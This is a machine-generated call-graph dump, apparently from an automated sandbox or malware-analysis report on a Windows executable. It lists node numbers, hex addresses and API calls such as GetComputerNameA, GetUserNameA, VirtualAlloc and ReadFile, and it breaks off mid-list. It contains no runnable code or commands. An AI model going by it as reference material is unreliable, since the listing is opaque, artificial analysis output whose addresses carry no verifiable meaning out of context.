46198 463cbd 46191->46198 46192 463e17 46195 403548 4 API calls 46192->46195 46193 463dc3 46196 4035dc 4 API calls 46193->46196 46194->46169 46199 463e1f 46195->46199 46204 463dd1 46196->46204 46201 403548 4 API calls 46197->46201 46200 4035dc 4 API calls 46198->46200 46202 463e15 46199->46202 46213 463ec6 46199->46213 46206 463ccb 46200->46206 46201->46172 46202->46199 46514 487a40 18 API calls 46202->46514 46204->46199 46204->46202 46208 40377c 18 API calls 46204->46208 46205 463e42 46205->46213 46515 487ca8 32 API calls 46205->46515 46206->46172 46209 40377c 18 API calls 46206->46209 46208->46204 46209->46206 46211 463f67 46517 42920c SendMessageA SendMessageA 46211->46517 46516 4291bc SendMessageA 46213->46516 46218 4636e1 46214->46218 46215 463743 46216 403548 4 API calls 46215->46216 46217 4635da 46216->46217 46220 463288 46217->46220 46218->46215 46236 463608 48 API calls 46218->46236 46221 4632bd 46220->46221 46222 403548 4 API calls 46221->46222 46232 4632c5 46222->46232 46223 46343d 46252 403568 46223->46252 46227 471af8 48 API calls 46227->46232 46228 4633af 46228->46223 46229 46073c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46228->46229 46230 44e094 OffsetRect InvalidateRect 46228->46230 46229->46228 46230->46228 46232->46227 46232->46228 46235 4035dc 4 API calls 46232->46235 46237 46f564 46232->46237 46249 44c82c 20 API calls 46232->46249 46250 44c850 20 API calls 46232->46250 46251 44c780 20 API calls 46232->46251 46235->46232 46236->46218 46238 46f57f 46237->46238 46240 46f640 46238->46240 46242 46f5b0 46238->46242 46262 46f2b4 33 API calls 46238->46262 46239 46f5d5 46246 46f5f6 46239->46246 46264 46f2b4 33 API calls 46239->46264 46240->46232 46242->46239 46263 46f2b4 33 API calls 46242->46263 46245 46f636 46256 46f400 46245->46256 46246->46240 46246->46245 46265 451de8 18 API calls 46246->46265 46249->46232 46250->46232 46251->46232 46254 40356e 46252->46254 46253 403593 46253->46127 46254->46253 46255 402668 4 API calls 46254->46255 46255->46254 46257 46f43d 46256->46257 46258 403598 18 API calls 46257->46258 46259 46f462 46258->46259 46266 46ecc8 46259->46266 46261 46f4ad 46261->46240 46262->46242 46263->46239 46264->46246 46265->46245 46267 46ecd6 46266->46267 46279 46e3e0 46267->46279 46270 46ece6 46329 46ec70 33 API calls 46270->46329 46271 46ecf1 46273 46ed16 46271->46273 46330 408cd4 33 API calls 46271->46330 46311 46e9f4 46273->46311 46275 46ecef 46277 46ed49 46275->46277 46331 408cd4 33 API calls 46275->46331 46277->46261 46280 46e400 46279->46280 46281 46e436 46280->46281 46282 46e41b 46280->46282 46285 46e577 46281->46285 46286 46e442 46281->46286 46283 46e41d 46282->46283 46284 46e499 46282->46284 46287 46e422 46283->46287 46288 46e45c 46283->46288 46289 403658 18 API calls 46284->46289 46296 403628 18 API calls 46285->46296 46297 46e431 46286->46297 46305 46e4af 46286->46305 46291 46e5a3 46287->46291 46292 46e42b 46287->46292 46290 403548 4 API calls 46288->46290 46310 46e464 46289->46310 46290->46310 46293 403548 4 API calls 46291->46293 46294 46e42e 46292->46294 46295 46e46d 46292->46295 46308 46e5ab 46293->46308 46294->46297 46299 46e483 46294->46299 46332 403658 46295->46332 46296->46310 46349 408cd4 33 API calls 46297->46349 46301 403658 18 API calls 46299->46301 46300 403548 4 API calls 46303 46e65d 46300->46303 46301->46310 46303->46270 46303->46271 46304 408ca0 18 API calls 46304->46308 46306 403628 18 API calls 46305->46306 46306->46310 46307 403658 18 API calls 46307->46308 46308->46304 46308->46307 46308->46310 46335 4036c4 46308->46335 46310->46300 46312 4035dc 4 API calls 46311->46312 46313 46ea1f 46312->46313 46314 46e3e0 33 API calls 46313->46314 46315 46ea26 46314->46315 46316 46e3e0 33 API calls 46315->46316 46326 46ea9e 46315->46326 46317 46ea5a 46316->46317 46366 46e734 33 API calls 46317->46366 46319 46ea69 46320 46ea92 46319->46320 46367 408cd4 33 API calls 46319->46367 46324 46e3e0 33 API calls 46320->46324 46321 46eac4 46323 403548 4 API calls 46321->46323 46325 46eafb 46321->46325 46323->46321 46324->46326 46325->46275 46326->46321 46360 46eff4 46326->46360 46363 46f290 46326->46363 46329->46275 46330->46273 46331->46277 46333 403628 18 API calls 46332->46333 46334 403665 46333->46334 46334->46310 46336 403707 46335->46336 46337 4036c8 46335->46337 46336->46308 46338 4036d2 46337->46338 46339 403598 46337->46339 46340 4036e5 46338->46340 46341 4036fc 46338->46341 46345 403604 18 API calls 46339->46345 46346 4035ac 46339->46346 46350 4039ec 46340->46350 46344 4039ec 18 API calls 46341->46344 46343 4035d8 46343->46308 46348 4036ea 46344->46348 46345->46346 46346->46343 46347 402668 4 API calls 46346->46347 46347->46343 46348->46308 46349->46310 46351 4039f9 46350->46351 46358 403a29 46350->46358 46352 403a22 46351->46352 46354 403a05 46351->46354 46355 403604 18 API calls 46352->46355 46353 403548 4 API calls 46356 403a13 46353->46356 46359 402680 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46354->46359 46355->46358 46356->46348 46358->46353 46359->46356 46368 487a5c 46360->46368 46362 46f00e 46362->46321 46454 487b3c 46363->46454 46365 46f2ae 46365->46321 46366->46319 46367->46320 46383 43dab8 46368->46383 46371 487b22 46373 487b32 46371->46373 46414 487378 18 API calls 46371->46414 46372 487a87 46388 431034 46372->46388 46373->46362 46380 487ac6 46413 434070 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46380->46413 46382 487b10 46382->46362 46415 431350 46383->46415 46385 43dae2 46386 403548 4 API calls 46385->46386 46387 43db66 46386->46387 46387->46371 46387->46372 46389 43103a 46388->46389 46390 402650 18 API calls 46389->46390 46391 43106a 46390->46391 46392 4875a8 46391->46392 46393 48767d 46392->46393 46397 4875c2 46392->46397 46399 43d684 46393->46399 46395 43400c 18 API calls 46395->46397 46397->46393 46397->46395 46398 403598 18 API calls 46397->46398 46420 408ca0 18 API calls 46397->46420 46421 431104 46397->46421 46398->46397 46400 43d6b1 46399->46400 46405 43d6a3 46399->46405 46400->46380 46401 43d72d 46409 43d7e7 46401->46409 46427 447154 46401->46427 46403 43d778 46433 43de40 46403->46433 46405->46400 46405->46401 46406 447154 18 API calls 46405->46406 46406->46405 46407 43d9ed 46407->46400 46453 4470f4 18 API calls 46407->46453 46409->46407 46410 43d9ce 46409->46410 46451 4470f4 18 API calls 46409->46451 46452 4470f4 18 API calls 46410->46452 46413->46382 46414->46373 46416 4035dc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46415->46416 46418 43135f 46416->46418 46417 431389 46417->46385 46418->46417 46419 40388c 18 API calls 46418->46419 46419->46418 46420->46397 46422 431112 46421->46422 46423 431124 46421->46423 46424 402680 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46422->46424 46425 431146 46423->46425 46426 4310a4 18 API calls 46423->46426 46424->46423 46425->46397 46426->46425 46428 447173 46427->46428 46429 44717a 46427->46429 46430 446f20 18 API calls 46428->46430 46431 431104 18 API calls 46429->46431 46430->46429 46432 44718a 46431->46432 46432->46403 46435 43de5c 46433->46435 46448 43de89 46433->46448 46434 402668 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46434->46435 46435->46434 46435->46448 46436 43debe 46436->46409 46438 43ff95 46438->46436 46439 4470f4 18 API calls 46439->46448 46440 43ca28 18 API calls 46440->46448 46441 43dd38 32 API calls 46441->46448 46442 433db8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46442->46448 46443 436f14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46443->46448 46444 4397d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46444->46448 46445 446f20 18 API calls 46445->46448 46446 433fd4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46446->46448 46447 433fb8 18 API calls 46447->46448 46448->46436 46448->46438 46448->46439 46448->46440 46448->46441 46448->46442 46448->46443 46448->46444 46448->46445 46448->46446 46448->46447 46449 436888 18 API calls 46448->46449 46450 4310a4 18 API calls 46448->46450 46449->46448 46450->46448 46451->46409 46452->46407 46453->46407 46455 43dab8 18 API calls 46454->46455 46456 487b57 46455->46456 46457 487b5e 46456->46457 46458 487bd7 46456->46458 46460 431034 18 API calls 46457->46460 46459 487be6 46458->46459 46481 487378 18 API calls 46458->46481 46459->46365 46462 487b6a 46460->46462 46463 4875a8 18 API calls 46462->46463 46464 487b8b 46463->46464 46473 4876c0 46464->46473 46467 43d684 32 API calls 46468 487ba8 46467->46468 46479 48740c 18 API calls 46468->46479 46470 487baf 46480 434070 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46470->46480 46472 487bcf 46472->46365 46474 4876dc 46473->46474 46482 43400c 46474->46482 46476 4876e1 46477 431104 18 API calls 46476->46477 46478 4876ec 46477->46478 46478->46467 46479->46470 46480->46472 46481->46459 46483 402650 18 API calls 46482->46483 46484 43401b 46483->46484 46484->46476 46520 40799c 46485->46520 46489 414bbe 46488->46489 46490 403628 18 API calls 46489->46490 46491 414bcb 46490->46491 46491->46150 46536 42a108 SendMessageA 46492->46536 46494 463477 46495 463497 46494->46495 46537 42a108 SendMessageA 46494->46537 46495->46164 46497 463487 46497->46164 46538 471b18 46498->46538 46502 463856 46501->46502 46503 403548 4 API calls 46502->46503 46511 463864 46502->46511 46503->46511 46504 463943 46505 403548 4 API calls 46504->46505 46506 463958 46505->46506 46507 403568 4 API calls 46506->46507 46508 463965 46507->46508 46508->46192 46508->46193 46509 471af8 48 API calls 46509->46511 46511->46504 46511->46509 46513 4035dc 4 API calls 46511->46513 46888 42e480 19 API calls 46511->46888 46889 46376c 48 API calls 46511->46889 46513->46511 46514->46205 46515->46213 46516->46211 46517->46130 46518->46152 46519->46152 46521 4079b9 46520->46521 46528 40764c 46521->46528 46524 4079e5 46526 403628 18 API calls 46524->46526 46527 407997 46526->46527 46527->46131 46531 407667 46528->46531 46529 407679 46529->46524 46533 4069fc 19 API calls 46529->46533 46531->46529 46534 40776e 33 API calls 46531->46534 46535 407640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 46531->46535 46533->46524 46534->46531 46535->46531 46536->46494 46537->46497 46539 4035dc 4 API calls 46538->46539 46547 471b4b 46539->46547 46540 471c50 46541 403568 4 API calls 46540->46541 46542 471b13 46541->46542 46542->46184 46543 403900 18 API calls 46543->46547 46547->46540 46547->46543 46550 4038c0 46547->46550 46557 470cc0 46547->46557 46759 451de8 18 API calls 46547->46759 46760 403948 46547->46760 46764 42c994 CharPrevA 46547->46764 46551 4038f2 46550->46551 46552 4038c5 46550->46552 46553 403548 4 API calls 46551->46553 46552->46551 46555 4038d9 46552->46555 46554 4038e8 46553->46554 46554->46547 46556 403628 18 API calls 46555->46556 46556->46554 46558 470d12 46557->46558 46559 470cf0 46557->46559 46560 470d32 46558->46560 46561 470d20 46558->46561 46559->46558 46769 46fb80 33 API calls 46559->46769 46564 470d95 46560->46564 46565 470d40 46560->46565 46562 4035dc 4 API calls 46561->46562 46603 470d2d 46562->46603 46573 470db6 46564->46573 46574 470da3 46564->46574 46567 470d6f 46565->46567 46568 470d49 46565->46568 46566 403548 4 API calls 46569 471516 46566->46569 46571 470d82 46567->46571 46771 451de8 18 API calls 46567->46771 46570 470d5c 46568->46570 46770 451de8 18 API calls 46568->46770 46575 403548 4 API calls 46569->46575 46577 4035dc 4 API calls 46570->46577 46572 4035dc 4 API calls 46571->46572 46572->46603 46581 470dd7 46573->46581 46582 470dc4 46573->46582 46579 4035dc 4 API calls 46574->46579 46580 47151e 46575->46580 46577->46603 46579->46603 46580->46547 46584 470e27 46581->46584 46585 470de5 46581->46585 46583 4035dc 4 API calls 46582->46583 46583->46603 46592 470e35 46584->46592 46593 470e48 46584->46593 46586 470e01 46585->46586 46587 470dee 46585->46587 46589 470e14 46586->46589 46772 451de8 18 API calls 46586->46772 46588 4035dc 4 API calls 46587->46588 46588->46603 46591 4035dc 4 API calls 46589->46591 46591->46603 46594 4035dc 4 API calls 46592->46594 46595 470e56 46593->46595 46596 470e69 46593->46596 46594->46603 46597 4035dc 4 API calls 46595->46597 46598 470e77 46596->46598 46599 470e8a 46596->46599 46597->46603 46600 4035dc 4 API calls 46598->46600 46601 470e98 46599->46601 46604 470eab 46599->46604 46600->46603 46602 4035dc 4 API calls 46601->46602 46602->46603 46603->46566 46605 470eb9 46604->46605 46606 470ee8 46604->46606 46607 470ed5 46605->46607 46608 470ec2 46605->46608 46611 470ef6 46606->46611 46612 470f25 46606->46612 46610 4035dc 4 API calls 46607->46610 46609 4035dc 4 API calls 46608->46609 46609->46603 46610->46603 46613 470f12 46611->46613 46614 470eff 46611->46614 46617 470f46 46612->46617 46618 470f33 46612->46618 46616 4035dc 4 API calls 46613->46616 46615 4035dc 4 API calls 46614->46615 46615->46603 46616->46603 46620 470f67 46617->46620 46621 470f54 46617->46621 46619 4035dc 4 API calls 46618->46619 46619->46603 46623 470f75 46620->46623 46624 470fa0 46620->46624 46622 4035dc 4 API calls 46621->46622 46622->46603 46625 470f91 46623->46625 46626 470f7e 46623->46626 46629 470fae 46624->46629 46630 470fd9 46624->46630 46773 451de8 18 API calls 46625->46773 46627 4035dc 4 API calls 46626->46627 46627->46603 46631 470fb7 46629->46631 46632 470fca 46629->46632 46635 470fe7 46630->46635 46636 470ff9 46630->46636 46633 4035dc 4 API calls 46631->46633 46774 451de8 18 API calls 46632->46774 46633->46603 46637 471af8 48 API calls 46635->46637 46638 471007 46636->46638 46639 47101a 46636->46639 46637->46603 46640 4035dc 4 API calls 46638->46640 46641 471035 46639->46641 46642 471028 46639->46642 46640->46603 46644 471043 46641->46644 46645 471050 46641->46645 46775 453cdc GetComputerNameA 46642->46775 46779 453d18 GetUserNameA 46644->46779 46647 4710b3 46645->46647 46648 47105e 46645->46648 46653 4710d4 46647->46653 46654 4710c1 46647->46654 46649 471067 46648->46649 46650 47108d 46648->46650 46651 47107a 46649->46651 46783 451de8 18 API calls 46649->46783 46652 4710a0 46650->46652 46784 451de8 18 API calls 46650->46784 46656 4035dc 4 API calls 46651->46656 46658 4035dc 4 API calls 46652->46658 46660 4710f5 46653->46660 46661 4710e2 46653->46661 46659 4035dc 4 API calls 46654->46659 46656->46603 46658->46603 46659->46603 46663 471116 46660->46663 46664 471103 46660->46664 46662 4035dc 4 API calls 46661->46662 46662->46603 46666 471137 46663->46666 46667 471124 46663->46667 46665 4035dc 4 API calls 46664->46665 46665->46603 46669 471145 46666->46669 46670 471158 46666->46670 46668 4035dc 4 API calls 46667->46668 46668->46603 46671 4035dc 4 API calls 46669->46671 46672 471166 46670->46672 46673 471179 46670->46673 46671->46603 46674 4035dc 4 API calls 46672->46674 46675 471217 46673->46675 46676 47118b 46673->46676 46674->46603 46684 471225 46675->46684 46685 471260 46675->46685 46677 471194 46676->46677 46678 4711ba 46676->46678 46679 4711a7 46677->46679 46785 451de8 18 API calls 46677->46785 46680 4711cd 46678->46680 46786 451de8 18 API calls 46678->46786 46683 4035dc 4 API calls 46679->46683 46765 472854 46680->46765 46683->46603 46688 471241 46684->46688 46689 47122e 46684->46689 46694 4712a0 46685->46694 46695 47126e 46685->46695 46696 4035dc 4 API calls 46688->46696 46691 4035dc 4 API calls 46689->46691 46691->46603 46702 4712e0 46694->46702 46703 4712ae 46694->46703 46698 471277 46695->46698 46699 47128e 46695->46699 46696->46603 46820 406dfc 33 API calls 46698->46820 46700 4035dc 4 API calls 46699->46700 46700->46603 46707 4712e9 46702->46707 46711 471305 46702->46711 46704 4712b7 46703->46704 46705 4712ce 46703->46705 46821 406dfc 33 API calls 46704->46821 46708 4035dc 4 API calls 46705->46708 46822 46fc1c 48 API calls 46707->46822 46708->46603 46710 4712f4 46713 4035dc 4 API calls 46710->46713 46714 471323 46711->46714 46715 47133f 46711->46715 46713->46603 46823 46fd68 48 API calls 46714->46823 46718 471354 46715->46718 46719 471370 46715->46719 46717 47132e 46720 4035dc 4 API calls 46717->46720 46824 470090 48 API calls 46718->46824 46724 471385 46719->46724 46725 4713a1 46719->46725 46720->46603 46722 47135f 46723 4035dc 4 API calls 46722->46723 46723->46603 46825 4703d0 48 API calls 46724->46825 46728 4713b6 46725->46728 46729 4713d2 46725->46729 46727 471390 46730 4035dc 4 API calls 46727->46730 46826 4705a8 48 API calls 46728->46826 46734 4713e7 46729->46734 46735 471403 46729->46735 46730->46603 46732 4713c1 46827 470744 48 API calls 46734->46827 46738 471418 46735->46738 46743 471434 46735->46743 46828 470810 48 API calls 46738->46828 46744 47144e 46743->46744 46754 4714ac 46743->46754 46759->46547 46761 40394c 46760->46761 46763 403977 46760->46763 46762 4039ec 18 API calls 46761->46762 46762->46763 46763->46547 46764->46547 46767 472865 46765->46767 46831 472818 46767->46831 46769->46559 46770->46570 46771->46571 46772->46589 46773->46603 46774->46603 46776 453d0a 46775->46776 46778 453cf8 46775->46778 46777 403548 4 API calls 46776->46777 46777->46778 46778->46603 46780 453d49 46779->46780 46782 453d37 46779->46782 46781 403548 4 API calls 46780->46781 46781->46782 46782->46603 46783->46651 46784->46652 46785->46679 46786->46680 46820->46603 46821->46603 46822->46710 46823->46717 46824->46722 46825->46727 46826->46732 46832 403548 4 API calls 46831->46832 46833 47282d 46832->46833 46838 472740 46833->46838 46839 472772 46838->46839 46846 4727a9 46838->46846 46848 472688 46839->46848 46841 4035dc 4 API calls 46846->46841 46849 4726b8 46848->46849 46888->46511 46889->46511 46890 416c0a 46891 416cb2 46890->46891 46892 416c22 46890->46892 46909 4153e4 18 API calls 46891->46909 46894 416c30 46892->46894 46895 416c3c SendMessageA 46892->46895 46896 416c56 46894->46896 46897 416c3a CallWindowProcA 46894->46897 46905 416c90 46895->46905 46906 41a120 GetSysColor 46896->46906 46897->46905 46900 416c61 SetTextColor 46901 416c76 46900->46901 46907 41a120 GetSysColor 46901->46907 46903 416c7b SetBkColor 46908 41a7a8 GetSysColor CreateBrushIndirect 46903->46908 46906->46900 46907->46903 46908->46905 46909->46905 46910 44af08 46911 44af0e 46910->46911 46916 415a14 46911->46916 46913 44af23 46926 44b0b8 46913->46926 46915 44af5a 46917 415a1e 46916->46917 46940 4143a4 46917->46940 46921 415a3f 46949 41a6ac 46921->46949 46927 44b0e4 46926->46927 46928 44b1e5 46926->46928 46927->46928 46931 44b0f4 46927->46931 46929 403548 4 API calls 46928->46929 46930 44b1fa 46929->46930 46930->46915 46932 414bb0 18 API calls 46931->46932 46933 44b11d 46932->46933 46934 44b14d 72E5AC50 46933->46934 46935 4036c4 18 API calls 46933->46935 46984 41a2b0 46934->46984 46935->46934 46938 44b182 46939 44b19d DrawTextA 72E5B380 46938->46939 46939->46915 46941 4143ae 46940->46941 46957 4102e8 46941->46957 46946 41f48c 46947 41f49c VirtualAlloc 46946->46947 46948 41f4ca 46946->46948 46947->46948 46948->46921 46950 41a6b2 46949->46950 46951 419c24 18 API calls 46950->46951 46952 415a51 46951->46952 46953 41a774 46952->46953 46954 41a786 46953->46954 46970 41a75c 46954->46970 46958 4102ef 46957->46958 46960 410312 46958->46960 46965 410480 19 API calls 46958->46965 46961 41a1ac 46960->46961 46962 41a1b2 46961->46962 46966 419c24 46962->46966 46964 4143da 46964->46946 46965->46960 46967 419c37 46966->46967 46968 402650 18 API calls 46967->46968 46969 419c6c 46967->46969 46968->46969 46969->46964 46973 419cf0 46970->46973 46974 419c24 18 API calls 46973->46974 46975 419d09 46974->46975 46978 419ca0 46975->46978 46979 415a63 46978->46979 46980 419caa 46978->46980 46979->46913 46980->46979 46981 419cc2 46980->46981 46982 419cbc DeleteObject 46980->46982 46983 402668 4 API calls 46981->46983 46982->46981 46983->46979 46985 41a377 46984->46985 46986 41a2db 46984->46986 46987 403548 4 API calls 46985->46987 46992 403668 46986->46992 46988 41a38f SelectObject 46987->46988 46988->46938 46990 41a333 46991 41a36b CreateFontIndirectA 46990->46991 46991->46985 46993 403628 18 API calls 46992->46993 46994 403672 46993->46994 46994->46990 46995 41670c 46996 416773 46995->46996 46997 416719 46995->46997 47002 416618 CreateWindowExA 46997->47002 46998 416720 SetPropA SetPropA 46998->46996 46999 416753 46998->46999 47000 416766 SetWindowPos 46999->47000 47000->46996 47002->46998 47003 475789 47008 4506ec 47003->47008 47005 47579d 47026 474748 47005->47026 47007 4757c1 47009 4506f9 47008->47009 47032 450010 ReadFile 47009->47032 47012 450736 47015 45074c 47012->47015 47051 408ca0 18 API calls 47012->47051 47014 450010 37 API calls 47014->47012 47038 450628 47015->47038 47020 450774 47041 44fec8 SetFilePointer 47020->47041 47021 450783 47046 44ff00 GetFileSize 47021->47046 47023 450798 47024 4507b8 47023->47024 47053 408ca0 18 API calls 47023->47053 47024->47005 47061 40b680 47026->47061 47028 4747a9 47028->47007 47030 474768 47030->47028 47065 406a38 47030->47065 47069 46ddb0 47030->47069 47033 450047 47032->47033 47034 450030 47032->47034 47033->47012 47033->47014 47035 450036 GetLastError 47034->47035 47036 450040 47034->47036 47035->47033 47035->47036 47054 44fffc 35 API calls 47036->47054 47055 4505d4 47038->47055 47042 44fefb 47041->47042 47043 44feeb GetLastError 47041->47043 47042->47021 47043->47042 47044 44fef4 47043->47044 47059 44fffc 35 API calls 47044->47059 47047 44ff2a 47046->47047 47048 44ff1a GetLastError 47046->47048 47047->47023 47048->47047 47049 44ff23 47048->47049 47060 44fffc 35 API calls 47049->47060 47051->47015 47052 408ca0 18 API calls 47052->47020 47053->47024 47054->47033 47056 4505f7 47055->47056 47057 4505e6 47055->47057 47056->47020 47056->47052 47058 4505eb InterlockedExchange 47057->47058 47058->47056 47059->47042 47060->47047 47062 40b68b 47061->47062 47063 40b6ab 47062->47063 47080 402680 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47062->47080 47063->47030 47066 406a3c 47065->47066 47067 402650 18 API calls 47066->47067 47068 406a42 47067->47068 47068->47030 47070 46de24 47069->47070 47078 46ddde 47069->47078 47081 45097c 47070->47081 47072 46de38 47073 403548 4 API calls 47072->47073 47075 46de4d 47073->47075 47074 403628 18 API calls 47074->47078 47075->47030 47077 403598 18 API calls 47077->47078 47078->47070 47078->47074 47078->47077 47079 45097c 40 API calls 47078->47079 47089 40388c 47078->47089 47079->47078 47080->47063 47082 450997 47081->47082 47083 45098c 47081->47083 47108 450920 38 API calls 47082->47108 47093 45a940 47083->47093 47085 4509a2 47087 450995 47085->47087 47109 408ca0 18 API calls 47085->47109 47087->47072 47090 403892 47089->47090 47092 4038a3 47089->47092 47091 403604 18 API calls 47090->47091 47090->47092 47091->47092 47092->47078 47094 45a968 47093->47094 47096 45a96f 47093->47096 47110 45a780 47094->47110 47097 45a996 47096->47097 47099 45a98c 47096->47099 47100 45a98a 47096->47100 47098 45a9cb 47097->47098 47134 45a694 33 API calls 47097->47134 47102 403548 4 API calls 47098->47102 47132 45a694 33 API calls 47099->47132 47105 407988 33 API calls 47100->47105 47104 45a9e0 47102->47104 47104->47087 47106 45a9b2 47105->47106 47133 45a61c 18 API calls 47106->47133 47108->47085 47109->47087 47111 45a7ac 47110->47111 47112 45a7b9 47111->47112 47138 45a694 33 API calls 47111->47138 47114 45a7d6 47112->47114 47139 45a694 33 API calls 47112->47139 47116 45a7ef 47114->47116 47140 45a694 33 API calls 47114->47140 47119 45a7ff 47116->47119 47141 45a694 33 API calls 47116->47141 47120 45a87c 47119->47120 47135 45a724 47119->47135 47124 45a8c4 47120->47124 47125 45a8c2 47120->47125 47128 45a8ce 47120->47128 47123 403548 4 API calls 47126 45a90d 47123->47126 47142 45a694 33 API calls 47124->47142 47129 407988 33 API calls 47125->47129 47126->47096 47128->47123 47130 45a8ea 47129->47130 47143 45a61c 18 API calls 47130->47143 47132->47097 47133->47097 47134->47098 47136 45a738 VirtualFree 47135->47136 47137 45a74a VirtualAlloc 47135->47137 47136->47137 47137->47120 47138->47112 47139->47114 47140->47116 47141->47119 47142->47128 47143->47128 47144 48b758 47192 40348c 47144->47192 47146 48b766 47195 4057f0 47146->47195 47148 48b76b 47198 409a20 47148->47198 47152 48b775 47208 410a1c 47152->47208 47154 48b77a 47212 4129f0 47154->47212 47156 48b784 47217 419108 GetVersion 47156->47217 47474 403444 47192->47474 47194 403491 GetModuleHandleA GetCommandLineA 47194->47146 47197 40582b 47195->47197 47475 403504 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47195->47475 47197->47148 47476 4090f8 47198->47476 47203 4087b4 21 API calls 47204 409a43 47203->47204 47491 409144 GetVersionExA 47204->47491 47207 409c40 6F7ADB20 47207->47152 47209 410a26 47208->47209 47210 410a65 GetCurrentThreadId 47209->47210 47211 410a80 47210->47211 47211->47154 47504 40afc4 47212->47504 47216 412a1c 47216->47156 47516 41deec 8 API calls 47217->47516 47219 419121 47518 419000 GetCurrentProcessId 47219->47518 47474->47194 47475->47197 47493 408d50 47476->47493 47479 408670 GetSystemDefaultLCID 47482 4086a6 47479->47482 47480 406e80 19 API calls 47480->47482 47481 4085fc 19 API calls 47481->47482 47482->47480 47482->47481 47483 403598 18 API calls 47482->47483 47487 408708 47482->47487 47483->47482 47484 406e80 19 API calls 47484->47487 47485 4085fc 19 API calls 47485->47487 47486 403598 18 API calls 47486->47487 47487->47484 47487->47485 47487->47486 47488 40878b 47487->47488 47489 403568 4 API calls 47488->47489 47490 4087a5 47489->47490 47490->47203 47492 40915b 47491->47492 47492->47207 47494 408d5c 47493->47494 47501 406e80 LoadStringA 47494->47501 47497 403598 18 API calls 47498 408d8d 47497->47498 47499 403548 4 API calls 47498->47499 47500 408da2 47499->47500 47500->47479 47502 403628 18 API calls 47501->47502 47503 406ead 47502->47503 47503->47497 47506 40afcb 47504->47506 47505 40afea 47508 4110d4 47505->47508 47506->47505 47515 40aefc 33 API calls 47506->47515 47509 4110f6 47508->47509 47510 406e80 19 API calls 47509->47510 47511 403598 18 API calls 47509->47511 47512 411115 47509->47512 47510->47509 47511->47509 47513 403548 4 API calls 47512->47513 47514 41112a 47513->47514 47514->47216 47515->47506 47517 41df66 47516->47517 47517->47219 47534 407954 47518->47534 47521 407954 33 API calls 47522 419061 GlobalAddAtomA 47521->47522 47523 419079 47522->47523 47524 40b680 4 API calls 47523->47524 47525 41908d 47524->47525 47538 423190 47525->47538 47535 407967 47534->47535 47536 40764c 33 API calls 47535->47536 47537 40797b GlobalAddAtomA GetCurrentThreadId 47536->47537 47537->47521 47539 42319a 47538->47539 47540 4102e8 19 API calls 47539->47540 47541 4231b0 47540->47541 47571 423304 LoadCursorA 47541->47571 47572 423323 47571->47572 47573 423337 LoadCursorA 47572->47573 47575 423354 47572->47575 49065 48ab18 49066 48ab22 49065->49066 49067 42e964 18 API calls 49066->49067 49068 48ab2b 49067->49068 49069 42e964 18 API calls 49068->49069 49070 48ab3e 49069->49070 49071 42e964 18 API calls 49070->49071 49072 48ab51 49071->49072 49073 42e964 18 API calls 49072->49073 49074 48ab64 49073->49074 49075 42438c 19 API calls 49074->49075 49076 48ab74 49075->49076 49098 4895f4 18 API calls 49076->49098 49078 48ab79 49099 42c568 19 API calls 49078->49099 49080 48ab8b 49081 403598 18 API calls 49080->49081 49082 48ab98 49081->49082 49083 42cd40 21 API calls 49082->49083 49084 48aba2 49083->49084 49085 48abc4 49084->49085 49251 489250 53 API calls 49084->49251 49087 48abcd 49085->49087 49088 48abd4 49085->49088 49253 489a20 84 API calls 49087->49253 49100 489c3c 49088->49100 49089 48abbf 49252 408c74 19 API calls 49089->49252 49093 48abd2 49254 455214 GetWindowLongA 72E69840 SendMessageA 49093->49254 49095 48abf7 49096 403548 4 API calls 49095->49096 49097 48ac16 49096->49097 49098->49078 49099->49080 49101 489c5f 49100->49101 49102 489c7d 49101->49102 49103 489c76 49101->49103 49105 489c98 49102->49105 49106 489ca4 49102->49106 49398 473650 6 API calls 49103->49398 49399 4551d0 7 API calls 49105->49399 49108 489cda 49106->49108 49110 489cd0 49106->49110 49111 489cc4 49106->49111 49109 455b64 39 API calls 49108->49109 49112 489d1b 49109->49112 49401 455b00 44 API calls 49110->49401 49400 45593c 52 API calls 49111->49400 49115 4035dc 4 API calls 49112->49115 49117 489d28 49115->49117 49116 489cce 49116->49108 49118 4036c4 18 API calls 49117->49118 49119 489d36 49118->49119 49120 455b64 39 API calls 49119->49120 49121 489d3e 49120->49121 49122 4035dc 4 API calls 49121->49122 49123 489d4b 49122->49123 49124 4036c4 18 API calls 49123->49124 49125 489d59 49124->49125 49126 455b64 39 API calls 49125->49126 49127 489d61 49126->49127 49128 489d8d 49127->49128 49130 4035dc 4 API calls 49127->49130 49129 4035dc 4 API calls 49128->49129 49132 489d9a 49129->49132 49131 489d77 49130->49131 49133 4036c4 18 API calls 49131->49133 49134 42d204 GetCommandLineA 49132->49134 49135 489d85 49133->49135 49136 489da2 49134->49136 49137 455b64 39 API calls 49135->49137 49138 4036c4 18 API calls 49136->49138 49137->49128 49139 489dad 49138->49139 49140 455b64 39 API calls 49139->49140 49141 489db5 49140->49141 49142 4736ec 39 API calls 49141->49142 49143 489dba 49142->49143 49144 44fde4 40 API calls 49143->49144 49145 489de0 49144->49145 49255 4571b4 49145->49255 49149 489e4d 49150 450b18 18 API calls 49149->49150 49151 489e5f 49150->49151 49152 403598 18 API calls 49151->49152 49251->49089 49253->49093 49254->49095 49256 4571ba 49255->49256 49428 457444 49256->49428 49259 45939c 42 API calls 49259->49149 49398->49102 49399->49106 49400->49116 49401->49108 49429 457449 49428->49429 49430 457459 49429->49430 49436 457404 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49429->49436 49432 403548 4 API calls 49430->49432 49433 457466 49432->49433 49434 403548 4 API calls 49433->49434 49435 4571d6 49434->49435 49435->49259 49436->49429 49639 474614 49640 42c4c4 19 API calls 49639->49640 49641 474640 49640->49641 49642 403708 18 API calls 49641->49642 49643 474650 49642->49643 49644 472128 35 API calls 49643->49644 49645 47465e 49644->49645 49646 